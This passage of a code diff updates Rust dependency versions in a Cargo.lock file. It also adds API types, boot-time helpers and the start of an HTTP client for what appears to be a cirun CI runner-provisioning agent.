+checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75"
+
+[[package]]
+name = "unicode-xid"
+version = "0.2.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ebc1c04c71510c7f702b52b7c350734c9ff1295c464a03335b00bb84fc54f853"
 
 [[package]]
 name = "untrusted"
@@ -1637,20 +1660,15 @@ checksum = "8ecb6da28b8a351d773b68d5825ac39017e680750f980f3a1a85cd8dd28a47c1"
 
 [[package]]
 name = "url"
-version = "2.5.4"
+version = "2.5.8"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "32f8b686cadd1473f4bd0117a5d28d36b1ade384ea9b5069a1c40aefed7fda60"
+checksum = "ff67a8a4397373c3ef660812acab3268222035010ab8680ec4215f38ba3d0eed"
 dependencies = [
  "form_urlencoded",
  "idna",
  "percent-encoding",
+ "serde",
 ]
-
-[[package]]
-name = "utf16_iter"
-version = "1.0.5"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c8232dd3cdaed5356e0f716d285e4b40b932ac434100fe9b7e0e8e935b9e6246"
 
 [[package]]
 name = "utf8_iter"
@@ -1666,11 +1684,13 @@ checksum = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821"
 
 [[package]]
 name = "uuid"
-version = "1.16.0"
+version = "1.23.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "458f7a779bf54acc9f347480ac654f68407d3aab21269a6e3c9f922acd9e2da9"
+checksum = "ddd74a9687298c6858e9b88ec8935ec45d22e8fd5e6394fa1bd4e99a87789c76"
 dependencies = [
- "getrandom 0.3.1",
+ "getrandom 0.4.2",
+ "js-sys",
+ "wasm-bindgen",
 ]
 
 [[package]]
@@ -1700,63 +1720,56 @@ dependencies = [
 
 [[package]]
 name = "wasi"
-version = "0.11.0+wasi-snapshot-preview1"
+version = "0.11.1+wasi-snapshot-preview1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423"
+checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b"
 
 [[package]]
-name = "wasi"
-version = "0.13.3+wasi-0.2.2"
+name = "wasip2"
+version = "1.0.3+wasi-0.2.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "26816d2e1a4a36a2940b96c5296ce403917633dff8f3440e9b236ed6f6bacad2"
+checksum = "20064672db26d7cdc89c7798c48a0fdfac8213434a1186e5ef29fd560ae223d6"
 dependencies = [
- "wit-bindgen-rt",
+ "wit-bindgen 0.57.1",
+]
+
+[[package]]
+name = "wasip3"
+version = "0.4.0+wasi-0.3.0-rc-2026-01-06"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5428f8bf88ea5ddc08faddef2ac4a67e390b88186c703ce6dbd955e1c145aca5"
+dependencies = [
+ "wit-bindgen 0.51.0",
 ]
 
 [[package]]
 name = "wasm-bindgen"
-version = "0.2.100"
+version = "0.2.121"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1edc8929d7499fc4e8f0be2262a241556cfc54a0bea223790e71446f2aab1ef5"
+checksum = "49ace1d07c165b0864824eee619580c4689389afa9dc9ed3a4c75040d82e6790"
 dependencies = [
  "cfg-if",
  "once_cell",
  "rustversion",
  "wasm-bindgen-macro",
-]
-
-[[package]]
-name = "wasm-bindgen-backend"
-version = "0.2.100"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2f0a0651a5c2bc21487bde11ee802ccaf4c51935d0d3d42a6101f98161700bc6"
-dependencies = [
- "bumpalo",
- "log",
- "proc-macro2",
- "quote",
- "syn",
  "wasm-bindgen-shared",
 ]
 
 [[package]]
 name = "wasm-bindgen-futures"
-version = "0.4.50"
+version = "0.4.71"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "555d470ec0bc3bb57890405e5d4322cc9ea83cebb085523ced7be4144dac1e61"
+checksum = "96492d0d3ffba25305a7dc88720d250b1401d7edca02cc3bcd50633b424673b8"
 dependencies = [
- "cfg-if",
  "js-sys",
- "once_cell",
  "wasm-bindgen",
- "web-sys",
 ]
 
 [[package]]
 name = "wasm-bindgen-macro"
-version = "0.2.100"
+version = "0.2.121"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7fe63fc6d09ed3792bd0897b314f53de8e16568c2b3f7982f468c0bf9bd0b407"
+checksum = "8e68e6f4afd367a562002c05637acb8578ff2dea1943df76afb9e83d177c8578"
 dependencies = [
  "quote",
  "wasm-bindgen-macro-support",
@@ -1764,31 +1777,65 @@ dependencies = [
 
 [[package]]
 name = "wasm-bindgen-macro-support"
-version = "0.2.100"
+version = "0.2.121"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8ae87ea40c9f689fc23f209965b6fb8a99ad69aeeb0231408be24920604395de"
+checksum = "d95a9ec35c64b2a7cb35d3fead40c4238d0940c86d107136999567a4703259f2"
 dependencies = [
+ "bumpalo",
  "proc-macro2",
  "quote",
  "syn",
- "wasm-bindgen-backend",
  "wasm-bindgen-shared",
 ]
 
 [[package]]
 name = "wasm-bindgen-shared"
-version = "0.2.100"
+version = "0.2.121"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1a05d73b933a847d6cccdda8f838a22ff101ad9bf93e33684f39c1f5f0eece3d"
+checksum = "c4e0100b01e9f0d03189a92b96772a1fb998639d981193d7dbab487302513441"
 dependencies = [
  "unicode-ident",
 ]
 
 [[package]]
-name = "web-sys"
-version = "0.3.77"
+name = "wasm-encoder"
+version = "0.244.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "33b6dd2ef9186f1f2072e409e99cd22a975331a6b3591b12c764e0e55c60d5d2"
+checksum = "990065f2fe63003fe337b932cfb5e3b80e0b4d0f5ff650e6985b1048f62c8319"
+dependencies = [
+ "leb128fmt",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasm-metadata"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bb0e353e6a2fbdc176932bbaab493762eb1255a7900fe0fea1a2f96c296cc909"
+dependencies = [
+ "anyhow",
+ "indexmap",
+ "wasm-encoder",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasmparser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe"
+dependencies = [
+ "bitflags",
+ "hashbrown 0.15.5",
+ "indexmap",
+ "semver",
+]
+
+[[package]]
+name = "web-sys"
+version = "0.3.98"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4b572dff8bcf38bad0fa19729c89bb5748b2b9b1d8be70cf90df697e3a8f32aa"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
@@ -1796,53 +1843,79 @@ dependencies = [
 
 [[package]]
 name = "winapi-util"
-version = "0.1.9"
+version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "cf221c93e13a30d793f7645a0e7762c55d169dbb0a49671918a2319d289b10bb"
+checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
 dependencies = [
- "windows-sys 0.59.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "windows-core"
-version = "0.52.0"
+version = "0.62.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "33ab640c8d7e35bf8ba19b884ba838ceb4fba93a4e8c65a9059d08afcfc683d9"
+checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb"
 dependencies = [
- "windows-targets 0.52.6",
+ "windows-implement",
+ "windows-interface",
+ "windows-link",
+ "windows-result",
+ "windows-strings",
+]
+
+[[package]]
+name = "windows-implement"
+version = "0.60.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
+]
+
+[[package]]
+name = "windows-interface"
+version = "0.59.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
 ]
 
 [[package]]
 name = "windows-link"
-version = "0.1.0"
+version = "0.2.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6dccfd733ce2b1753b03b6d3c65edf020262ea35e20ccdf3e288043e6dd620e3"
+checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5"
 
 [[package]]
 name = "windows-registry"
-version = "0.4.0"
+version = "0.6.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4286ad90ddb45071efd1a66dfa43eb02dd0dfbae1545ad6cc3c51cf34d7e8ba3"
+checksum = "02752bf7fbdcce7f2a27a742f798510f3e5ad88dbe84871e5168e2120c3d5720"
 dependencies = [
+ "windows-link",
  "windows-result",
  "windows-strings",
- "windows-targets 0.53.0",
 ]
 
 [[package]]
 name = "windows-result"
-version = "0.3.1"
+version = "0.4.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "06374efe858fab7e4f881500e6e86ec8bc28f9462c47e5a9941a0142ad86b189"
+checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5"
 dependencies = [
  "windows-link",
 ]
 
 [[package]]
 name = "windows-strings"
-version = "0.3.1"
+version = "0.5.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "87fa48cc5d406560701792be122a10132491cff9d0aeb23583cc2dcafc847319"
+checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091"
 dependencies = [
  "windows-link",
 ]
@@ -1853,16 +1926,16 @@ version = "0.52.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d"
 dependencies = [
- "windows-targets 0.52.6",
+ "windows-targets",
 ]
 
 [[package]]
 name = "windows-sys"
-version = "0.59.0"
+version = "0.61.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1e38bc4d79ed67fd075bcc251a1c39b32a1776bbe92e5bef1f0bf1f8c531853b"
+checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc"
 dependencies = [
- "windows-targets 0.52.6",
+ "windows-link",
 ]
 
 [[package]]
@@ -1871,30 +1944,14 @@ version = "0.52.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973"
 dependencies = [
- "windows_aarch64_gnullvm 0.52.6",
- "windows_aarch64_msvc 0.52.6",
- "windows_i686_gnu 0.52.6",
- "windows_i686_gnullvm 0.52.6",
- "windows_i686_msvc 0.52.6",
- "windows_x86_64_gnu 0.52.6",
- "windows_x86_64_gnullvm 0.52.6",
- "windows_x86_64_msvc 0.52.6",
-]
-
-[[package]]
-name = "windows-targets"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "b1e4c7e8ceaaf9cb7d7507c974735728ab453b67ef8f18febdd7c11fe59dca8b"
-dependencies = [
- "windows_aarch64_gnullvm 0.53.0",
- "windows_aarch64_msvc 0.53.0",
- "windows_i686_gnu 0.53.0",
- "windows_i686_gnullvm 0.53.0",
- "windows_i686_msvc 0.53.0",
- "windows_x86_64_gnu 0.53.0",
- "windows_x86_64_gnullvm 0.53.0",
- "windows_x86_64_msvc 0.53.0",
+ "windows_aarch64_gnullvm",
+ "windows_aarch64_msvc",
+ "windows_i686_gnu",
+ "windows_i686_gnullvm",
+ "windows_i686_msvc",
+ "windows_x86_64_gnu",
+ "windows_x86_64_gnullvm",
+ "windows_x86_64_msvc",
 ]
 
 [[package]]
@@ -1904,22 +1961,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3"
 
 [[package]]
-name = "windows_aarch64_gnullvm"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "86b8d5f90ddd19cb4a147a5fa63ca848db3df085e25fee3cc10b39b6eebae764"
-
-[[package]]
 name = "windows_aarch64_msvc"
 version = "0.52.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469"
-
-[[package]]
-name = "windows_aarch64_msvc"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c7651a1f62a11b8cbd5e0d42526e55f2c99886c77e007179efff86c2b137e66c"
 
 [[package]]
 name = "windows_i686_gnu"
@@ -1928,22 +1973,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b"
 
 [[package]]
-name = "windows_i686_gnu"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c1dc67659d35f387f5f6c479dc4e28f1d4bb90ddd1a5d3da2e5d97b42d6272c3"
-
-[[package]]
 name = "windows_i686_gnullvm"
 version = "0.52.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66"
-
-[[package]]
-name = "windows_i686_gnullvm"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9ce6ccbdedbf6d6354471319e781c0dfef054c81fbc7cf83f338a4296c0cae11"
 
 [[package]]
 name = "windows_i686_msvc"
@@ -1952,22 +1985,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66"
 
 [[package]]
-name = "windows_i686_msvc"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "581fee95406bb13382d2f65cd4a908ca7b1e4c2f1917f143ba16efe98a589b5d"
-
-[[package]]
 name = "windows_x86_64_gnu"
 version = "0.52.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78"
-
-[[package]]
-name = "windows_x86_64_gnu"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2e55b5ac9ea33f2fc1716d1742db15574fd6fc8dadc51caab1c16a3d3b4190ba"
 
 [[package]]
 name = "windows_x86_64_gnullvm"
@@ -1976,49 +1997,116 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d"
 
 [[package]]
-name = "windows_x86_64_gnullvm"
-version = "0.53.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0a6e035dd0599267ce1ee132e51c27dd29437f63325753051e71dd9e42406c57"
-
-[[package]]
 name = "windows_x86_64_msvc"
 version = "0.52.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec"
 
 [[package]]
-name = "windows_x86_64_msvc"
-version = "0.53.0"
+name = "wit-bindgen"
+version = "0.51.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "271414315aff87387382ec3d271b52d7ae78726f5d44ac98b4f4030c91880486"
-
-[[package]]
-name = "wit-bindgen-rt"
-version = "0.33.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3268f3d866458b787f390cf61f4bbb563b922d091359f9608842999eaee3943c"
+checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5"
 dependencies = [
- "bitflags",
+ "wit-bindgen-rust-macro",
 ]
 
 [[package]]
-name = "write16"
-version = "1.0.0"
+name = "wit-bindgen"
+version = "0.57.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d1890f4022759daae28ed4fe62859b1236caebfc61ede2f63ed4e695f3f6d936"
+checksum = "1ebf944e87a7c253233ad6766e082e3cd714b5d03812acc24c318f549614536e"
+
+[[package]]
+name = "wit-bindgen-core"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ea61de684c3ea68cb082b7a88508a8b27fcc8b797d738bfc99a82facf1d752dc"
+dependencies = [
+ "anyhow",
+ "heck",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-bindgen-rust"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b7c566e0f4b284dd6561c786d9cb0142da491f46a9fbed79ea69cdad5db17f21"
+dependencies = [
+ "anyhow",
+ "heck",
+ "indexmap",
+ "prettyplease",
+ "syn",
+ "wasm-metadata",
+ "wit-bindgen-core",
+ "wit-component",
+]
+
+[[package]]
+name = "wit-bindgen-rust-macro"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0c0f9bfd77e6a48eccf51359e3ae77140a7f50b1e2ebfe62422d8afdaffab17a"
+dependencies = [
+ "anyhow",
+ "prettyplease",
+ "proc-macro2",
+ "quote",
+ "syn",
+ "wit-bindgen-core",
+ "wit-bindgen-rust",
+]
+
+[[package]]
+name = "wit-component"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2"
+dependencies = [
+ "anyhow",
+ "bitflags",
+ "indexmap",
+ "log",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "wasm-encoder",
+ "wasm-metadata",
+ "wasmparser",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-parser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ecc8ac4bc1dc3381b7f59c34f00b67e18f910c2c0f50015669dde7def656a736"
+dependencies = [
+ "anyhow",
+ "id-arena",
+ "indexmap",
+ "log",
+ "semver",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "unicode-xid",
+ "wasmparser",
+]
 
 [[package]]
 name = "writeable"
-version = "0.5.5"
+version = "0.6.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1e9df38ee2d2c3c5948ea468a8406ff0db0b29ae1ffde1bcf20ef305bcc95c51"
+checksum = "1ffae5123b2d3fc086436f8834ae3ab053a283cfac8fe0a0b8eaae044768a4c4"
 
 [[package]]
 name = "xattr"
-version = "1.5.0"
+version = "1.6.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0d65cbf2f12c15564212d48f4e3dfb87923d25d611f2aed18f4cb23f0413d89e"
+checksum = "32e45ad4206f6d2479085147f02bc2ef834ac85886624a23575ae137c8aa8156"
 dependencies = [
  "libc",
  "rustix",
@@ -2026,11 +2114,10 @@ dependencies = [
 
 [[package]]
 name = "yoke"
-version = "0.7.5"
+version = "0.8.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "120e6aef9aa629e3d4f52dc8cc43a015c7724194c97dfaf45180d2daf2b77f40"
+checksum = "abe8c5fda708d9ca3df187cae8bfb9ceda00dd96231bed36e445a1a48e66f9ca"
 dependencies = [
- "serde",
  "stable_deref_trait",
  "yoke-derive",
  "zerofrom",
@@ -2038,9 +2125,9 @@ dependencies = [
 
 [[package]]
 name = "yoke-derive"
-version = "0.7.5"
+version = "0.8.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2380878cad4ac9aac1e2435f3eb4020e8374b5f13c296cb75b4620ff8e229154"
+checksum = "de844c262c8848816172cef550288e7dc6c7b7814b4ee56b3e1553f275f1858e"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -2050,18 +2137,18 @@ dependencies = [
 
 [[package]]
 name = "zerofrom"
-version = "0.1.6"
+version = "0.1.8"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "50cc42e0333e05660c3587f3bf9d0478688e15d870fab3346451ce7f8c9fbea5"
+checksum = "0ec05a11813ea801ff6d75110ad09cd0824ddba17dfe17128ea0d5f68e6c5272"
 dependencies = [
  "zerofrom-derive",
 ]
 
 [[package]]
 name = "zerofrom-derive"
-version = "0.1.6"
+version = "0.1.7"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d71e5d6e06ab090c67b5e44993ec16b72dcbaabc526db883a360057678b48502"
+checksum = "11532158c46691caf0f2593ea8358fed6bbf68a0315e80aae9bd41fbade684a1"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -2071,15 +2158,26 @@ dependencies = [
 
 [[package]]
 name = "zeroize"
-version = "1.8.1"
+version = "1.8.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "ced3678a2879b30306d323f4542626697a464a97c0a07c9aebf7ebca65cd4dde"
+checksum = "b97154e67e32c85465826e8bcc1c59429aaaf107c1e4a9e53c8d8ccd5eff88d0"
+
+[[package]]
+name = "zerotrie"
+version = "0.2.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0f9152d31db0792fa83f70fb2f83148effb5c1f5b8c7686c3459e361d9bc20bf"
+dependencies = [
+ "displaydoc",
+ "yoke",
+ "zerofrom",
+]
 
 [[package]]
 name = "zerovec"
-version = "0.10.4"
+version = "0.11.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "aa2b893d79df23bfb12d5461018d408ea19dfafe76c2c7ef6d4eba614f8ff079"
+checksum = "90f911cbc359ab6af17377d242225f4d75119aec87ea711a880987b18cd7b239"
 dependencies = [
  "yoke",
  "zerofrom",
@@ -2088,11 +2186,17 @@ dependencies = [
 
 [[package]]
 name = "zerovec-derive"
-version = "0.10.3"
+version = "0.11.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6eafa6dfb17584ea3e2bd6e76e0cc15ad7af12b09abdd1ca55961bed9b1063c6"
+checksum = "625dc425cab0dca6dc3c3319506e6593dcb08a9f387ea3b284dbd52a92c40555"
 dependencies = [
  "proc-macro2",
  "quote",
  "syn",
 ]
+
+[[package]]
+name = "zmij"
+version = "1.0.21"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa"

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -23,6 +23,7 @@ flate2 = "1.1.0"
 tar = "0.4.44"
 walkdir = "2.5.0"
 chrono = "0.4.40"
+async-trait = "0.1.83"
 
 # The profile that 'dist' will build with
 [profile.dist]

--- a/src/api.rs
+++ b/src/api.rs
@@ -1,0 +1,138 @@
+//! API JSON types exchanged between agent and SaaS backend.
+
+use serde::{Deserialize, Serialize};
+
+#[derive(Debug, Serialize, Deserialize, Clone)]
+pub struct AgentInfo {
+    pub id: String,
+    pub hostname: String,
+    pub os: String,
+    pub arch: String,
+}
+
+#[derive(Debug, Serialize, Deserialize)]
+pub struct ApiResponse {
+    #[serde(default)]
+    pub runners_to_provision: Vec<RunnerToProvision>,
+    pub runners_to_delete: Vec<RunnerToDelete>,
+}
+
+/// Lume template-matching spec. Only consumed on macos (the executor
+/// that uses it is cfg-gated to macos), so the struct is never
+/// constructed on linux — `allow(dead_code)` keeps the type definition
+/// available for parity without tripping `-D warnings`.
+#[cfg_attr(not(target_os = "macos"), allow(dead_code))]
+#[derive(Debug, Serialize, Deserialize, Clone)]
+pub struct TemplateConfig {
+    pub image: String,
+    pub registry: Option<String>,
+    pub organization: Option<String>,
+    pub cpu: u32,
+    pub memory: u32,
+    pub disk: u32,
+    pub os: String,
+}
+
+#[derive(Debug, Serialize, Deserialize, Clone)]
+pub struct RunnerLogin {
+    pub username: String,
+    pub password: String,
+}
+
+#[derive(Debug, Clone)]
+pub struct RunnerResources {
+    pub cpu: u32,
+    pub memory: u32,
+    pub disk: u32,
+}
+
+fn default_max_retries() -> u32 {
+    3
+}
+
+#[derive(Debug, Serialize, Deserialize, Clone)]
+pub struct RunnerToProvision {
+    pub name: String,
+    pub provision_script: String,
+    pub image: String,
+    pub os: String,
+    /// `#[serde(default)]` because the cirun api uses Go's `omitempty` and
+    /// drops zero values from the wire — agent must accept the field missing.
+    #[serde(default)]
+    pub cpu: u32,
+    #[serde(default)]
+    pub memory: u32,
+    #[serde(default)]
+    pub disk: u32,
+    pub login: RunnerLogin,
+    #[serde(default = "default_max_retries")]
+    pub max_retries: u32,
+    /// Top-level executor field — SaaS sets this from .cirun.yml's
+    /// `extra_config.executor`. Wins over `extra_config.executor`. Old SaaS
+    /// builds omit this field; agent falls back to extra_config / OS default.
+    #[serde(default)]
+    pub executor: Option<String>,
+    /// Top-level gpu field — same source-of-truth story as `executor`.
+    /// Wire format is a string ("none"/"all"/"1"/...).
+    #[serde(default)]
+    pub gpu: Option<String>,
+    #[serde(default)]
+    pub extra_config: Option<serde_json::Value>,
+}
+
+#[derive(Debug, Serialize, Deserialize)]
+pub struct RunnerToDelete {
+    pub name: String,
+}
+
+#[allow(dead_code)]
+#[derive(Debug, Serialize, Deserialize)]
+pub struct CommandResponse {
+    pub command: String,
+    pub output: String,
+    pub error: String,
+    pub agent: AgentInfo,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+
+    /// cirun api uses Go's `omitempty` and drops zero values from JSON output.
+    /// Agent must deserialize cleanly when cpu/memory/disk are absent.
+    #[test]
+    fn runner_to_provision_accepts_omitempty_resource_fields() {
+        let payload = json!({
+            "name": "r1",
+            "provision_script": "echo hi",
+            "image": "ubuntu:24.04",
+            "os": "linux",
+            "login": { "username": "u", "password": "p" },
+        });
+        let r: RunnerToProvision = serde_json::from_value(payload).expect("must deserialize");
+        assert_eq!(r.cpu, 0);
+        assert_eq!(r.memory, 0);
+        assert_eq!(r.disk, 0);
+        assert_eq!(r.max_retries, 3);
+        assert_eq!(r.executor, None);
+    }
+
+    #[test]
+    fn runner_to_provision_reads_top_level_executor_and_gpu() {
+        let payload = json!({
+            "name": "r1",
+            "provision_script": "echo hi",
+            "image": "ubuntu:24.04",
+            "os": "linux",
+            "cpu": 4,
+            "memory": 8,
+            "login": { "username": "u", "password": "p" },
+            "executor": "docker",
+            "gpu": "all",
+        });
+        let r: RunnerToProvision = serde_json::from_value(payload).unwrap();
+        assert_eq!(r.executor.as_deref(), Some("docker"));
+        assert_eq!(r.gpu.as_deref(), Some("all"));
+    }
+}

--- a/src/bootstrap.rs
+++ b/src/bootstrap.rs
@@ -1,0 +1,90 @@
+//! Agent boot-time helpers: hostname, sshpass probe, agent-id persistence.
+//! Lives here so `main.rs` stays under the file-size cap and is purely the
+//! `tokio::main` entrypoint + polling loop.
+
+use crate::api::AgentInfo;
+use log::{error, info, warn};
+use std::env;
+use std::fs;
+use std::path::Path;
+use std::process::Command as StdCommand;
+use uuid::Uuid;
+
+pub fn get_hostname() -> String {
+    if let Ok(hostname) = env::var("HOSTNAME") {
+        return hostname;
+    }
+
+    if let Ok(output) = StdCommand::new("hostname").output() {
+        if let Ok(hostname) = String::from_utf8(output.stdout) {
+            return hostname.trim().to_string();
+        }
+    }
+
+    "unknown-host".to_string()
+}
+
+/// `sshpass` is only required for the lume executor's SSH provisioning path.
+/// macOS doesn't ship it; we warn (not exit) so docker dispatch can still run.
+pub fn check_sshpass_installed() -> bool {
+    match StdCommand::new("which").arg("sshpass").output() {
+        Ok(output) => {
+            if output.status.success() {
+                info!("[OK] sshpass is installed");
+                true
+            } else {
+                error!("✘ sshpass is not installed");
+                error!("VM provisioning requires sshpass for SSH authentication");
+                error!("Install it using: brew install sshpass");
+                false
+            }
+        }
+        Err(e) => {
+            warn!("Failed to check for sshpass: {}", e);
+            false
+        }
+    }
+}
+
+/// Load (or generate + persist) a stable agent UUID. The file lives at
+/// `$HOME/.agent_id` by default — survives restarts so the same agent keeps
+/// its identity with the cirun api.
+pub fn get_agent_info(id_file: &str) -> AgentInfo {
+    let id = if Path::new(id_file).exists() {
+        match fs::read_to_string(id_file) {
+            Ok(id) => {
+                let id = id.trim().to_string();
+                info!("Using existing agent ID: {}", id);
+                id
+            }
+            Err(e) => {
+                error!("Failed to read agent ID file: {}", e);
+                let new_id = Uuid::new_v4().to_string();
+                info!("Generated new agent ID: {}", new_id);
+                if let Err(e) = fs::write(id_file, &new_id) {
+                    error!("Failed to write agent ID to file: {}", e);
+                }
+                new_id
+            }
+        }
+    } else {
+        let new_id = Uuid::new_v4().to_string();
+        info!("Generated new agent ID: {}", new_id);
+        if let Err(e) = fs::write(id_file, &new_id) {
+            error!("Failed to write agent ID to file: {}", e);
+        }
+        new_id
+    };
+
+    // CIRUN_AGENT_OS overrides the reported host OS. Useful when the agent
+    // serves a different container OS than its host (e.g. macOS host running
+    // linux containers via Docker Desktop).
+    let os = env::var("CIRUN_AGENT_OS").unwrap_or_else(|_| env::consts::OS.to_string());
+
+    AgentInfo {
+        id,
+        hostname: get_hostname(),
+        os,
+        arch: env::consts::ARCH.to_string(),
+    }
+}

--- a/src/cirun_client.rs
+++ b/src/cirun_client.rs
@@ -1,0 +1,614 @@
+//! HTTP client + provisioning orchestrator. Polls the cirun api for runners
+//! to provision/delete, dispatches via the executor registry, tracks retries
+//! and per-runner executor binding.
+
+use crate::api::{AgentInfo, ApiResponse, RunnerToProvision};
+use crate::provision::{provision_single_runner, ProvisionResult};
+use log::{debug, error, info, warn};
+use reqwest::{Client, Error};
